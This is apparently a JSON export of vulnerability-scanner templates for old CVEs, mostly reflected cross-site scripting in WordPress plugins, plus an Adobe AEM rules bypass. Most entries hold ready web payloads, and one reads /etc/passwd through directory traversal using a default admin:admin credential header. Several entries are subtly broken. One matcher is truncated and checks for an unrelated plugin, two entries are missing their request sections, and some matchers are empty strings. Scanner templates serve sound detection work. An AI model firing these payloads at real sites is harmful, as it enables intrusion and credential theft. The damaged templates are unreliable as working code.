While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Fixed in version 1.0.6\n reference:\n - https://wpscan.com/vulnerability/46bf6c69-b612-4aee-965d-91f53f642054\n - https://g0blin.co.uk/g0blin-00057/\n - https://wordpress.org/plugins/newstatpress/#developers\n - https://nvd.nist.gov/vuln/detail/CVE-2015-9312\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2015-9312\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: newstatpress_project\n product: newstatpress\n framework: wordpress\n tags: cve2015,cve,xss,authenticated,wp,newstatpress,wpscan,wordpress,wp-plugin,newstatpress_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"=7'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"404-to-301\")'\n condition: and\n# digest: 490a004630440220323384f1c4a276c3079649349540d04cea85e2fe8ce4c73d852567ac9fc5ba7b02203375e2c826ab3ce90ed5672b210ae86d810e572690d581ff587260ceceebb4f7:922c64590222798bb761d5b6d8e72950", 
"hash": "c21ae31645c15300dce896ae5e73942a", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f70" }, "name": "CVE-2015-9414.yaml", "content": "id: CVE-2015-9414\n\ninfo:\n name: WordPress Symposium <=15.8.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Symposium through 15.8.1 contains a reflected cross-site scripting vulnerability via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter which allows an attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress Symposium plugin (>=15.8.2) which includes a fix for this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095\n - https://wpvulndb.com/vulnerabilities/8175\n - https://wordpress.org/plugins/wp-symposium/#developers\n - https://nvd.nist.gov/vuln/detail/CVE-2015-9414\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2015-9414\n cwe-id: CWE-79\n epss-score: 0.00111\n epss-percentile: 0.44236\n cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wpsymposiumpro\n product: wp-symposium\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/wp-symposium\"\n tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'WP Symposium'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - 
\"{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e9ea14ccaf1cec6af62f525d294701a6819909cb884ac9d793d6ab8849904ac5022100d8914e7df61908a6243f8f7a41608d4e7f093bb148158e4c261d0e1e62d2ce17:922c64590222798bb761d5b6d8e72950", "hash": "f257a0aa0a9b47e4a4afd852c68c0ac9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f71" }, "name": "CVE-2015-9480.yaml", "content": "id: CVE-2015-9480\n\ninfo:\n name: WordPress RobotCPA 5 - Directory Traversal\n author: daffainfo\n severity: high\n description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter.\n impact: |\n An attacker can access sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.\n remediation: |\n Update to the latest version of the WordPress RobotCPA 5 plugin to fix the directory traversal vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/37252\n - https://nvd.nist.gov/vuln/detail/CVE-2015-9480\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-9480\n cwe-id: CWE-22\n epss-score: 0.57022\n epss-percentile: 0.97634\n cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: robot-cpa\n product: robotcpa\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/robotcpa\"\n tags: cve2015,cve,wp-plugin,lfi,edb,wordpress,robot-cpa\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n 
regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205b6c0951be97607789304e920c017d4688b1910f346389d67f4cd410a0fd8dd0022100a8479311b48571c59e35a2d0bff7ccb7a5fe58be76c4cbe82b6491b1b2d6709b:922c64590222798bb761d5b6d8e72950", "hash": "c59d56381751e1bf5ce9335a3a95d504", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f72" }, "name": "CVE-2016-0957.yaml", "content": "id: CVE-2016-0957\n\ninfo:\n name: Adobe AEM Dispatcher <4.15 - Rules Bypass\n author: geeknik\n severity: high\n description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.\n impact: |\n The vulnerability allows attackers to bypass security rules and potentially gain unauthorized access to sensitive information or perform malicious actions.\n remediation: |\n Upgrade to Adobe AEM Dispatcher version 4.15 or higher to fix the vulnerability.\n reference:\n - https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html\n - https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html\n - https://nvd.nist.gov/vuln/detail/CVE-2016-0957\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2016-0957\n epss-score: 0.03344\n epss-percentile: 0.91144\n cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: adobe\n product: dispatcher\n shodan-query: http.component:\"Adobe Experience Manager\"\n tags: cve2016,cve,adobe,aem\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/system/console?.css\"\n\n headers:\n Authorization: \"Basic YWRtaW46YWRtaW4K\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Adobe\"\n - \"java.lang\"\n - 
\"(Runtime)\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204c01000f7bfc95e33eb45dbcf5a4712b3572527055ecccd3e2921db31c171f3d022069b7039ef57b710a12d2dc565f13665a6328eb7756d5e5304a82666df5c05520:922c64590222798bb761d5b6d8e72950", "hash": "683cebf17bf0d51b22e74db3b346871a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f73" }, "name": "CVE-2016-1000126.yaml", "content": "id: CVE-2016-1000126\n\ninfo:\n name: WordPress Admin Font Editor <=1.8 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Admin Font Editor 1.8 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher) to fix this vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=526\n - https://wordpress.org/plugins/admin-font-editor\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000126\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000126\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.4505\n cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: admin-font-editor_project\n product: admin-font-editor\n framework: wordpress\n google-query: 
inurl:\"/wp-content/plugins/admin-font-editor\"\n tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Admin Font Editor'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220013dac67a4811933161dbe03eead3bef250ae8d02feba5efd6d39f42544d64e6022100ca5ea281b37719f80730ff5798e2b6963bfd85356337dadb64d627acd3dc86ec:922c64590222798bb761d5b6d8e72950", "hash": "c66800e43b87c93dbe54c7e081f83c17", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f74" }, "name": "CVE-2016-1000127.yaml", "content": "id: CVE-2016-1000127\n\ninfo:\n name: WordPress AJAX Random Post <=2.00 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress AJAX Random Post 2.00 is vulnerable to reflected cross-site scripting.\n impact: |\n This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress AJAX Random Post plugin (2.00 or higher) to fix this issue.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=494\n - https://wordpress.org/plugins/ajax-random-post\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000127\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000127\n cwe-id: 
CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45851\n cpe: cpe:2.3:a:ajax-random-post_project:ajax-random-post:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: ajax-random-post_project\n product: ajax-random-post\n framework: wordpress\n tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Ajax Random Post'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201fa95a038bca7a976d180543ed0e6ed4a47bd232e52e238bbde22284bb929c9502210084219362e0fc7b0176f542d1b9573a5aae5160e1b35b267dd8bf34f6a4cb1a41:922c64590222798bb761d5b6d8e72950", "hash": "882babcabd13627390cd4fb194c44719", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f75" }, "name": "CVE-2016-1000128.yaml", "content": "id: CVE-2016-1000128\n\ninfo:\n name: WordPress anti-plagiarism <=3.60 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress anti-plagiarism 3.6.0 and prior are vulnerable to reflected cross-site scripting.\n remediation: |\n Update the WordPress anti-plagiarism plugin to version >3.60 or apply the latest security patches provided by the vendor.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=161\n - https://wordpress.org/plugins/anti-plagiarism\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000128\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000128\n cwe-id: CWE-79\n epss-score: 0.00101\n epss-percentile: 
0.41115\n cpe: cpe:2.3:a:anti-plagiarism_project:anti-plagiarism:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: anti-plagiarism_project\n product: anti-plagiarism\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/anti-plagiarism\"\n tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'anti plagiarism'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f3239ff972161e24aca8bf71e1f1521d3187bb86c523eeb72a2ea2e0aa08a12c02201d0977e00530389a5ddfa4b4e5c336e60dc52c7b4ac6659d003a508bd7111e24:922c64590222798bb761d5b6d8e72950", "hash": "0d83e9d59d52d2ef122dfa9a4b88a45c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f76" }, "name": "CVE-2016-1000129.yaml", "content": "id: CVE-2016-1000129\n\ninfo:\n name: WordPress defa-online-image-protector <=3.3 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress defa-online-image-protector 3.3 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. 
remediation: |\n Update the WordPress defa-online-image-protector plugin to a version newer than 3.3 (3.3 and earlier are affected), or remove the plugin if no fixed release is available.\n
4a0a00473045022100e11b59590fb5e11215513513bfc35c13cc2cb35612d4bf738fb8920c6bc688ee02206c93ea212aeb8f613a8d78e7130372b903b1e884981e05ab41b34c8da05bb1bf:922c64590222798bb761d5b6d8e72950", "hash": "baf604730c06cf1e4074703d9730de47", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f77" }, "name": "CVE-2016-1000130.yaml", "content": "id: CVE-2016-1000130\n\ninfo:\n name: WordPress e-search <=1.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Wordpress plugin e-search 1.0 and before contains a cross-site scripting vulnerability via date_select.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress e-search plugin to mitigate this vulnerability.\n reference:\n - https://wordpress.org/plugins/e-search\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=394\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000130\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000130\n cwe-id: CWE-79\n epss-score: 0.00093\n epss-percentile: 0.38905\n cpe: cpe:2.3:a:e-search_project:e-search:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: e-search_project\n product: e-search\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/e-search\"\n tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/e-search/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 
'Search'\n - 'Tags:'\n - 'Tested up to:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100bd7768054ea7d2cdaaa293c8dbd3650c0e844a1f7d00a9d9e1c2de7c22668228022100910936c4c4bb62052f5aa9f885dd0e3cf525b1bb615175b2c1b0a703b55fcf07:922c64590222798bb761d5b6d8e72950", "hash": "824991bf47dae859f24793f05ca7f413", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f78" }, "name": "CVE-2016-1000131.yaml", "content": "id: CVE-2016-1000131\n\ninfo:\n name: WordPress e-search <=1.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress e-search 1.0 and before contains a reflected cross-site scripting vulnerability via title_az.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of the WordPress e-search plugin to mitigate this vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=393\n - https://wordpress.org/plugins/e-search\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000131\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000131\n cwe-id: CWE-79\n epss-score: 0.00101\n epss-percentile: 0.40457\n cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: e-search_project\n product: esearch\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/e-search\"\n tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/e-search/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Search'\n - 'Tags:'\n - 'Tested up to:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220407a865ce50567b9cfec98ff87801912e6a450a0cc7cb90608a2bcefb09326e2022100fa66ee427289bd34d36b90328ed3dd597de4413ef0023d1b1b6f5ff54f0bd5f1:922c64590222798bb761d5b6d8e72950", "hash": "450d02fb6f1d04576ebbe3fbccf1c3a4", "level": 4, "time": "2024-05-17 23:39:44" }, { 
"_id": { "$oid": "66477a413521042ccf307f79" }, "name": "CVE-2016-1000132.yaml", "content": "id: CVE-2016-1000132\n\ninfo:\n name: WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress enhanced-tooltipglossary 3.2.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of WordPress enhanced-tooltipglossary plugin (3.2.9 or higher) which includes a fix for this vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=37\n - https://wordpress.org/plugins/enhanced-tooltipglossary\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000132\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000132\n cwe-id: CWE-79\n epss-score: 0.00116\n epss-percentile: 0.44389\n cpe: cpe:2.3:a:cminds:tooltip_glossary:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: cminds\n product: tooltip_glossary\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/enhanced-tooltipglossary\"\n tags: cve2016,cve,wordpress,xss,wp-plugin,cminds\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/enhanced-tooltipglossary/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'CM Tooltip Glossary'\n\n - method: GET\n path:\n - 
\"{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022056b01771211e3c34ab1cee5a82de7389cedd20ce4d5a4a1ce19b3b20bbb86293022002f2fac47b84c364827d0040101b36a98b508648776caa202680e8b449340920:922c64590222798bb761d5b6d8e72950", "hash": "2423673bae4091e10d53d079c0347f1a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f7a" }, "name": "CVE-2016-1000133.yaml", "content": "id: CVE-2016-1000133\n\ninfo:\n name: WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Wordpress plugin forget-about-shortcode-buttons 1.1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. 
remediation: |\n Update the WordPress forget-about-shortcode-buttons plugin to a version newer than 1.1.1 (1.1.1 is the affected version), or remove the plugin if no fixed release is available.\n
"hash": "c4f7d85e3fed07144e66d631a26455f5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f7b" }, "name": "CVE-2016-1000134.yaml", "content": "id: CVE-2016-1000134\n\ninfo:\n name: WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via playlist.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress HDW Video Gallery plugin (>=1.3) which includes a fix for this vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=530\n - https://wordpress.org/plugins/hdw-tube\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000134\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000134\n cwe-id: CWE-79\n epss-score: 0.00101\n epss-percentile: 0.41177\n cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: hdw-tube_project\n product: hdw-tube\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/hdw-tube\"\n tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'HDW WordPress Video Gallery'\n\n - method: GET\n path:\n - 
\"{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009e1f0521838c2885e1b261ccf9f75e7d5fce03c68143774e5c51d9e2ec04aa460221008d6d8821f9f324f964566338a04fdee2e0db95cfa34c8efef2fbe87ea3366457:922c64590222798bb761d5b6d8e72950", "hash": "87a21cbb0879b8fba597ee5e019e9a1f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f7c" }, "name": "CVE-2016-1000135.yaml", "content": "id: CVE-2016-1000135\n\ninfo:\n name: WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via mychannel.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress HDW Video Gallery plugin (>=1.3) which includes a fix for this vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=533\n - https://wordpress.org/plugins/hdw-tube\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000135\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000135\n cwe-id: CWE-79\n epss-score: 0.00101\n epss-percentile: 0.40457\n cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: hdw-tube_project\n product: hdw-tube\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/hdw-tube\"\n tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'HDW WordPress Video Gallery'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100fe47bbf2d6b77cbaf7c14f4d4c3fdec3fa4f8e7760ecc729a6d6cebdb8b912890221009014c68b01c8342e2958cfefd2d4e86dea48acac20d8b8ee693e0f7f07884097:922c64590222798bb761d5b6d8e72950", "hash": "e739a6e80a67b59d1abb3c94dfadb20d", "level": 4, 
